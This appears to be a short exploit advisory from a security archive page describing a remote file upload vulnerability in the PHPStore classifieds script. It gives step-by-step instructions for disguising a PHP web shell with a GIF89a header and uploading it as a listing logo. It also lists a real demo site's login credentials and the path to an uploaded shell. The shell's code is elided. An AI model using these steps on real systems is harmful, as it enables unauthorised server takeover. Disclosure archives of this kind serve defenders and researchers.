PHP Store Complete Classifieds Script suffers from a remote file upload vulnerability.
95ff18614f1255ab968128c72c4e6ba80a3f06502d54bccbc4593a1c98fc7332PHPStore Complete Customizable Classifieds Remote File Upload
Author: ZoRLu msn: trt-turk@hotmail.com
home: www.z0rlu.blogspot.com
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-----------------------------------------
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
login to site and Add Listing click open the new page upload logo (upload your_shell.php)
your_shell.php path:
localhost/script/yellow_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php
http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )
------------------------------------------------
thanks: str0ke & yildirimordulari.org & darkc0de.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed